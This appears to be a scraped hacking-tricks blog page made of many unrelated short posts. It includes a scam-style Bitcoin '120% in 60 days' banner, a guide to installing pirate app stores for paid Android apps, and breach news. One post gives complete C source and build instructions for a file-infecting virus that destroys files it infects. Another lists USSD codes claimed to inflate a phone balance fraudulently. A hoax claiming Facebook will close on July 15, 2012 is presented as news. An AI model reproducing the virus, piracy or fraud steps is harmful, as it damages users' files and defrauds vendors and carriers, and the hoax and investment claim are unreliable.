EARN 120% BITCOIN IN JUST 60 DAYS

Install Paid Android Applications For Free

Free-Android-Paid-Applications
Android, developed by Google is the most widely used mobile operating system that has more then 450,000 application. But all the applications are not free, some of them cost less and some cost quite a lot. Buying all of your favorite apps is not economically feasible. And hence we found two great apps which will let you download and install paid android apps absolutely free. The two apps are Applanet and BlackMart. You just need to install any or both of these applications to enjoy unlimited android apps and games for free.


Enable Your Device To Install From Unknown Sources :


enable-installation-from-unknown-sources-AndroidIf you have not enabled installation of applications from unknown sources on your Android device before, then read on. Otherwise skip this. 
An Android device is set to block installation of applications from unknown sources. Unknown source here typically means any source other than Google Play (Android Market). So in a situation where you need to install an application by transferring it from any other device like your computer, you need to unblock it. This can be done easily. Just follow these steps below.
  1. Click the "Menu" button on your home screen.
  2. Go to "Settings".
  3. Now go to "applications" tab.
  4. Now tick the "Unknown sources" option.
That's it. Now you can install any application from outside the Google Market also.

Installing and Using Applanet :


Applanet-Download-Paid-Android-Applications-For-FreeInstalling applanet is not at all hard. Just download the Applanet app. Transfer it to you phone or tablet or any other Android device through data cable or Bluetooth or any other supported transfer medium. Now enable installation from unknown sources and install the app on your device.

After installation just run the app from the menu. You will see a screen as shown on the right side. The interface is quite similar to the Google Play Store or the Android Market. On the top right you will have a search option, that allows you to search for any application, game or any stuff within the Applanet database. Till date Applanet has 15000+ apps in its database. You have to pay absolutely nothing for any full version paid app you download. Below the search button you will have three buttons, one for Applications which allows you to browse applications, second one for Games and the third for keeping an eye on your downloads. The games are also categorized on the basis of their genre and you can browse through them according to your own interest. So download Applanet app from here and download paid apps for free on your Android device. Click on the image to see a larger version of the screenshot.



Installing And Using BlackMart :


BlackMart-Download-Paid-Android-Applications-For-Free
The installation of BlackMart is exactly similar to Applanet. You have to first download the app from here. Now allow installation from unknown sources, then transfer the downloaded file to you Android device. After transferring the file, navigate to the file and install it. Now open the BlackMart application. You will see a screen as shown on the right side. The application interface is also similar to that of Google Play and Applanet. Applications and Games are arranged in different sections. The installed section shows the applications currently installed on your device and also if an update is available for any of your installed application. The only difference between the Applanet and BlackMart is when you download an application with Applanet, it automatically installs in your device, but when you download an application with BlackMart, it shows a notification in the notification tray that the application is downloaded and click here to install it. It requires just one additional click and nothing else. BlackMart also has a very vast database of best android apps and games and you can download any number of android apps for free using BlackMart.

What Does Facebook Knows About Your Love Life

What-Facebook-Knows-About-Your-Love-Life
Be careful with Facebook, it knows more about your Love life than you could think of. The infographic by WorldWideLearn shows that Facebook knows which songs you listen to after starting or ending a relationship. The infographic tells that about half of the Facebook users list their relationship status on Facebook. According to Facebook, in 2012, 37% of its users were single, 31% were married and 22% were in a relationship. There are many more statistics which you will find in the infographic below.





What Does Facebook Know About Your Love Life?

The Great Mind Challenge 2011: The results are in!


 Dear Reader,
The much awaited The Great Mind Challenge (TGMC) 2011 first round results are out and we are pleased to announce the winners who have qualified to the next round of evaluation.

View TGMC first round results now!
 

The TGMC team congratulates the first round winners and wishes them the best of luck for the final round.

The proficient and innovative projects submitted by many of the teams made this a great competition. Thanks to all of the participants for making the 2011 season of TGMC another success.

We hope that this platform has been able to live up to its high expectation of providing you hands-on experience on IBM software tools and technologies.

While you prepare for glory, broadcast your talent by creating and uploading a one minute video pitching your TGMC project. It's a chance for the top twenty teams of TGMC 2011 to be featured as "TGMC Role Models" and get their videos promoted by TGMC on their official YouTube channel.

Get more details about TGMC Role Models.

ALL THE BEST

from our side...

SHARE RESULT WITH UR FReNDZ..

Nepal Hackers posts 10,000 stolen Facebook accounts online

A hacking group from Nepal known as TeamSwaStika, has published 10,000 stolen Facebook accounts on Pastebin for everyone to see and take advantage of.

The group appears to have obtained the stolen accounting data, through either phishing, or data mining malware-infected hosts for Facebook credentials. Another alternative would be that they have purchased the cache containing the stolen credentials from a specific service reselling accounting data, as these services are quite popular within the cybercrime ecosystem nowadays.

As a precaution, Facebook users are advised to periodically change their passwords from a malware-free host.

COMPUTER VIRUS: CREATING A COMPUTER VIRUS IN C

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.


#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h> FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}


COMPILING METHOD:

USING BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

USING BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to reinfect

That’s it

 WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE

Linkedin hacked; 6.46 million Passwords Leaked Online

A user on a Russian forum has claimed to have downloaded 6.46 million user hashed passwords from LinkedIn.

It looks as though some of the weaker passwords — around 300,000 of them — may have been cracked already. Other users have been seen reaching out to fellow hackers in an apparent bid to seek help in cracking the encryption.

Finnish security firm CERT-FI is warning that the hackers may have access to user email addresses also, though they appear encrypted and unreadable.

A source said they had searched and discovered their password in the cache. It has been reported that the passwords were encrypted using the SHA-1 algorithm — which is known for its flaws — but unless a password is weak, it may take a while to decrypt the remaining cache.

LinkedIn has more than 150 million users worldwide. This apparent hack could affect less than 10 percent of its user base, but it will strike a damaging blow to the ‘professional’ social network’s reputation.

It is advised users change their passwords as a precautionary measure.

LinkedIn said it was “looking into reports of stolen passwords” on its official Twitter account.

Beautify Facebook [Chrome]


Sample
Beautify Facebook is a Chrome extension that lets you tweak and change the way Facebook appears in your browser. It is a must have extension. Must try if you are a Facebook user.

Features:
1. The add-on lets you add a custom background image to Facebook to hide the traditional white background.
2. Rounds off the corners of chat boxes and sidebars.
3.  Adds emoticons to Facebook chat, and provides transparency settings so you can tweak the look of your news feed or the sidebars to fade into the background.
4. Makes Sidebars on both the sides fixed , so that you can scroll down without leaving the sidebars. This is the most amazing feature of Beautify Facebook.
And much more , give it a try.
Fullscreen capture 9252011 101441 PM.bmp
A Screenshot After Installing Beautify Facebook. Click The Image For Bigger View
Get Beautify Facebook


[EXPIRED] TATA DOCOMO JUN BALANCE TRICK

HERE IS TRICK TO INCREASE YOUR DOCOMO BALANCE IN ALL STATE......

TRY AT YOUR OWN RISK.....
THIS ONLY EDUCATIONAL PURPOSE WE NOT RESPOSIBLE FOR ANY MISUSE OF INFORMATION......

DO THIS FOLLOWING STEP....
DO IT TRY AND TRY BALANCE WILL NOT COME IN 1ST TRY...

DIAL 

GUJARAT USER :=  *141*1*5*7*1#  
 HARYANA USER:= *141*1*4*7*1#
UP WEST:= *141*1*2*7*1#
RAJ. USER := *141*1*6*7*1#
MP USER:= *141*1*7*7*1# 
KERALA USER:= *141*1*8*7*1# 
KARNATAKA USER := *141*1*9*7*1# 
MAH:= *141*1*1*7*1# 

 

How To Disable Timeline And Use Old Facebook [Firefox]

Facebook

We gave you a tutorial on how to use Facebook without Timeline on Chrome and now we are giving you the same for Mozilla Firefox. As we had an extension for Chrome we also have an extension for Firefox to switch User-Agent. This is also a client side thing and can be done on your computer . That means others will see your profile with the new interface but you can use the old Facebook for all the profiles. The steps are all the same and very easy and can be done by installing a simple add-on.

Steps To Use Facebook Without Timeline On Firefox:

1. Go to this link and install User-Agent Switcher For Firefox.
2. Once installed go to Tools –> Default User Agent –> Internet Explorer –> Internet Explorer 6.
( Use Internet Explorer 7 if chat is not working in Internet Explorer 6 )

Disable Facebook Timeline On Firefox
3. Now refresh your Facebook page and use Facebook without the Timeline.
Leave your comment if any of you had any problem.

25+ Most Creative And Awesome Facebook Timeline Covers

Timeline covers are the new thing to look out for Facebook users. Since the launch of Facebook Timeline profile, everybody is trying to make their Facebook cover look awesome and unique. We got our eyes on 29 of them. These are the ones we found most Creative and Funniest. If you think yours can make up to this list then leave it in the comments. We will consider including it. Also Make an amazing Timeline cover for yourself or select from 15 amazing Timeline covers.


funny-creative-facebook-timeline-cover-1
funny-creative-facebook-timeline-cover-2
funny-creative-facebook-timeline-cover-3
funny-creative-facebook-timeline-cover-4
funny-creative-facebook-timeline-cover-5
funny-creative-facebook-timeline-cover-6
funny-creative-facebook-timeline-cover-7
funny-creative-facebook-timeline-cover-8
funny-creative-facebook-timeline-cover-9
funny-creative-facebook-timeline-cover-10
funny-creative-facebook-timeline-cover-11
funny-creative-facebook-timeline-cover-12
funny-creative-facebook-timeline-cover-13
funny-creative-facebook-timeline-cover-14
funny-creative-facebook-timeline-cover-15
funny-creative-facebook-timeline-cover-16
funny-creative-facebook-timeline-cover-17
funny-creative-facebook-timeline-cover-18
funny-creative-facebook-timeline-cover-19
funny-creative-facebook-timeline-cover-20
funny-creative-facebook-timeline-cover-21
funny-creative-facebook-timeline-cover-22
funny-creative-facebook-timeline-cover-23
funny-creative-facebook-timeline-cover-24
funny-creative-facebook-timeline-cover-25
funny-creative-facebook-timeline-cover-26
funny-creative-facebook-timeline-cover-27
funny-creative-facebook-timeline-cover-28
funny-creative-facebook-timeline-cover-29

Facebook Will close On July 15?

Here is for more facebook smileys and tricks posted again with bad news of FACEBOOK closed

Facebook is the largest social networking site in the world. Billions of users are using Facebook. But I have got news from weeklyworldnews that Facebook will close on July 15 and no more users can’t login their Facebook account after 15 July.
Mark Zuckerberg founder of facebook has announced that Facebook will close after 15 July 2012 and he mentioned that managing of facebook is too tough and stressful.
He said –
“Facebook has gotten out of management,” supposedly said Zuckerberg in a media meeting outside his Palo Alto workplace, “and the pressure of handling this organization has damaged my way of lifestyle. I need to put an end to all the insanity.”

Avrat Humarthi, Vice President of Technical Affairs at Facebook said-

“After July 15, 2012 the whole web page will shut down”

Zuckerberg request to all users to remove their all personal information from the website before 15 July and after 15 July all photos and information will be deleted.

Zuckerberg want to take this as not personal deal. He said that it is better to make real friends outside the door than Virtual friends.
I don’t know what will happen. If it will close then a lot of company, business and entrepreneurs who are using facebook as their best media to broadcast their service will get the terrible situation.
I think people can’t adapt their daily activities without using Facebook.
I wish Facebook run their activities till then ends of the world.
Don’t keep the article as personally I just got it from other strong sources-
 

© 2012 H@Ck tHe wOrLd - Designed by rAj | ToS | Privacy Policy | Sitemap

Join me On Facebook | Contact Us | Write For Us